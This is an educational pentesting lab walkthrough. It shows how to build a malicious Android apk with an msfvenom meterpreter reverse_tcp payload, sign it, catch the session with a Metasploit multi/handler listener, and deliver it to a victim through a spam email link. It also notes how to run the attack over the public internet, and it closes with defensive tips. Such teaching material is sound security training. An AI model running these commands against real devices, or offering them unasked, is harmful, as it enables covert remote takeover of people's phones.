In this Lab, we are going to learn how you can hack an Android mobile device using MSFvenom and Metasploit framework. Here, we will use MSFvenom for generating payload and save as an apk file and setup listener to Metasploit framework. Once user/victim download and install the malicious apk then, an attacker can easily get back session on Metasploit. An attacker needs to do some social engineering to install apk on victim mobile.
We will demonstrate this by using following tools
- Kali Linux
- Android emulator
- VMware or Virtual Box (virtual environment)
Once the following setup is without any error, then we are ready.
NOTE: This Lab is for education purpose only, InfoSec Institute not responsible for any illegal activity performed by the student.
Learn about penetration testing
Build your real-world pentesting skills through 34 hands-on labs. This skills course covers
⇒ Web app hacking
⇒ Hacking with Android
⇒ Ethical hacking
In this Lab, we are using Kali Linux and Android emulator to perform mobile penetration testing. Kali Linux is one of the Debian-based operating systems with several tools aimed at various information security tasks, such as Penetration Testing, Forensics, and Reverse Engineering. Kali Linux is one of a most used operating system for penetration testing. Android emulator is used as an Android device on which penetration testing tasks can be performed.
Virtual Machines Needed: Kali Linux and Android Emulator VM
Step 1: Starting Kali Linux
- From your VM, Start the Kali Linux and log in with root/toor (Userid/Password).
- Open a terminal prompt and make an exploit for Android emulator using MSFvenom tool.
Before starting, let talk about MSFvenom, it is a combination of msfpayload and msfencode. These tools are extremely useful for generating payloads in various formats and encoding these payloads using various encoder modules. Merging these two tools into a single tool just made sense. It standardizes the command line options, speeds things up a bit by using a single framework instance and handles all possible output formats. MSFvenom used to make a payload to penetrate the android emulator.
By using MSFvenom we create a payload .apk file for this we use following command:
Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.5 LPORT=4444 R > /root/Desktop/pentest.apk
Figure 1 MSFvenom payload
-p = Payload to be used
LHOST = Localhost IP to receive a back connection (Check yours with ifconfig command).
LPORT= Localhost Port on which the connection listen for the victim (We set it to 444).
R = Raw format (We select apk).
Location = to save the file.
Note: In this command, we have used the local address because we are in the local environment. To this in the public network, you have to enter your public address in LHOST and enable the port forwarding on the Router.
After this command, now you can locate your file on the Desktop with the name pentest.apk.
Figure 2 Pentest File Located
After Successfully created .apk file, we need to sign certificate because Android mobile devices are not allowing installing apps without the appropriately signed certificate. Android devices only install the signed .apk files.
We need to sign the apk file manually in Kali Linux using:
- Keytool (Preinstalled)
- jar signer (Preinstalled)
- zipalign (Need to Install)
To sign the apk file locally use these commands:
Terminal: keytool -genkey -v -keystore my-release-key.Keystore -alias alias_name -keyalg RSA -keysize 2048 -validity 10000
Figure 3 Keytool making Keystore
Terminal: jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 -keystore my-release-key.Keystore APPNAME.apk aliasname
Figure 4 Signing an apk file with JARsigner
Terminal:jarsigner -verify -verbose -certs APPNAME.apk
Figure 5 Verifying the Apk using jar signer
Zipalign is not preinstalled in Kali Linux, so you have to install it first.
Figure 6 Installing zipalign
Terminal: zipalign -v 4 APPNAME.apk NEWAPPNAME.apk
Figure 7 Verifying the apk into new file using zipalgin
Now we have signed our pentest.Apk file successfully and it can be run on any Android device. Our new filename is Android.apk after the verification with zipalaign.
Figure 8 Showing APK file
Now we have to start the listener on the Kali Linux machine with multi/handler exploit using Metasploit.
Figure 9 Starting Metasploit
Metasploit begins with the console.
Figure 10 Display Metasploit start screen
Now launch the exploit multi/handler and use Android payload to listen to the clients.
Terminal: use exploit/multi/handler
Figure 11 Setting up the exploit.
Now set the options for payload, listener IP (LHOST) and listener PORT(LPORT). We have used localhost IP, port number 4444 and payload android/meterpreter/reverse_tcp while creating an APK file with MSFvenom.
Figure 12 Setting up the exploit
Then we can successfully run the exploit and start listening to the android device. Now, the device installs our app on the device, and it gets penetrated with exploit
Figure 13 Executing the exploit
Now we transfer the Android.Apk file to the victim mobile device. In our environment, we are using an android emulator to penetrate the Android device. For sharing android.apk to the victim an email link or share the downloading link to the mobile device.
Now it’s time to Quick setup the Android emulator.
Steps to configure the android emulator:
- Download the image file for android x86 code project from the google code projects site. (https://code.google.com/archive/p/android-x86/downloads)
- Create a virtual machine using another version 2.6x kernel in VMware workstation.
- Mount the ISO file into VMware options.
- Finish the process and run the machine in LIVE mode.
- Setup the Android device.
- Setup the Google account.
Note: Android x86 project can connect it to a local network with Ethernet adapter (VMnet8). If you are using another emulator to penetrate the Android device, you can also use CLI android emulator.
After setting up the android emulator in VM, we are going to download the file from cloud link which we have created on Kali Linux using cloud website, and we have e-mailed to victim account.
Figure 14 Spam email
Download the .apk file and install it with unknown resources allowed on the Android device.
Figure 15 downloaded the file into an android device.
Then run and install the .apk file.
Figure 16 Installing the application on an Android device.
After completing the installation, we are going back to the Kali machine and start the meterpreter session.
Ethical Hacking Boot Camp — 93% Exam Pass Rate
Now move back to the KALI Linux:
We already started the multi/handler exploit to listen on port =4444 and local IP address. Open up the multi/handler terminal.
Figure 17 successfully got the meterpreter session
Bingo!!! We got the meterpreter session of Android device, and we can check more details with “sysinfo” command as mentioned in the below screenshot.
Figure –18 to Display system details.
There are lots of commands available in meterpreter by using “?” help command to see more options what we can perform with an Android device. We have successfully penetrated the Android device using Kali Linux and penetration testing tools.
You can perform this attack on the public network also using Public IP address and port forwarding Router.
Here we will also look some point which prevents user from these types of attack
- Don’t allow downloading any apps from cloud websites.
- Don’t install apps with unknown resources enabled option.
- Use antivirus in a mobile device to keep an eye on every moment of mobile.
- Don’t click any random link
- Never download unwanted doc,
apk file from unknown source
- Always confirm with source pertaining to file to double sure
LHOST – is a local host where you need to get session after payload execute
RHOST – remote host or target host
LPORT- Local port where you want session
RPORT – Remote port or target port number
Exploit – executing exploit
Payload – activity to perform after successful exploit execution
Exploit – malicious code to exploit vulnerability